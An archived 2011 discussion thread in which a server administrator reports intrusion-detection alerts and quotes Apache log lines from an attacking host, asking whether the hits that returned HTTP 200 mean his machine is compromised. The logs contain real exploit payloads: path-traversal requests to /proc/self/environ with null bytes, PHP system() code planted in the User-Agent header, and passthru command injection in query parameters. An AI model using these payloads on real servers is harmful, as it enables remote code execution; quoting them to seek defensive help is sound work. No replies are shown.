Discussion:
Possible successful probe?
(too old to reply)
David Guntner
2011-12-12 15:29:00 UTC
Permalink
Still running my semi-crippled 2011 install - haven't had a chance to do
anything about that, yet.... :-)
A total of 3 possible successful probes were detected (the following URLs
contain strings that match one or more of a listing of strings that
/?file=../../../../../../proc/self/environ%00 HTTP Response 200
/?mod=../../../../../../proc/self/environ%00 HTTP Response 200
/?page=../../../../../../proc/self/environ%00 HTTP Response 200
That's all it says, so I'm not sure what the reset of the URL was.
Question is, is the above anything I need to worry about? Is there
going to be any information that they could get from the above that
might allow them to compromise my machine?

--Dave
David Guntner
2011-12-12 15:37:20 UTC
Permalink
Post by David Guntner
Still running my semi-crippled 2011 install - haven't had a chance to do
anything about that, yet.... :-)
A total of 3 possible successful probes were detected (the following URLs
contain strings that match one or more of a listing of strings that
/?file=../../../../../../proc/self/environ%00 HTTP Response 200
/?mod=../../../../../../proc/self/environ%00 HTTP Response 200
/?page=../../../../../../proc/self/environ%00 HTTP Response 200
That's all it says, so I'm not sure what the reset of the URL was.
Question is, is the above anything I need to worry about? Is there
going to be any information that they could get from the above that
might allow them to compromise my machine?
As a followup, I checked the access log for Apache and found the
Post by David Guntner
mail.rostcom.net - - [11/Dec/2011:13:16:14 -0800] "GET /awstatstotals/awstatstotals.php?sort=%7b%24%7bpassthru%28chr(105)%2echr(100)%29%7d%7d%7b%24%7bexit%28%29%7d%7d HTTP/1.1" 404 990 "-" "Mozilla/5.0 (Wind
ows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
mail.rostcom.net - - [11/Dec/2011:13:16:14 -0800] "GET /?file=../../../../../../proc/self/environ%00 HTTP/1.1" 200 4186 "-" "<?php system(\"id\"); ?>"
mail.rostcom.net - - [11/Dec/2011:13:16:14 -0800] "GET /?page=../../../../../../proc/self/environ%00 HTTP/1.1" 200 4186 "-" "<?php system(\"id\"); ?>"
mail.rostcom.net - - [11/Dec/2011:13:16:14 -0800] "GET /?mod=../../../../../../proc/self/environ%00 HTTP/1.1" 200 4186 "-" "<?php system(\"id\"); ?>"
mail.rostcom.net - - [11/Dec/2011:13:16:15 -0800] "GET /index.php?option=com_simpledownload&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 990 "-" "<?php system(\"id\"); ?>"
mail.rostcom.net - - [11/Dec/2011:13:16:15 -0800] "GET /site.php?a={%24{passthru%28chr%28105%29.chr%28100%29%29}} HTTP/1.1" 404 990 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
From the 404s at the end, it looks like whatever they were trying to do
at that point failed. But I'm still a bit concerned about the 3 200s
leading up to it. So the question stands: Is there anything there that
someone could use to compromise the system?

--Dave

Loading...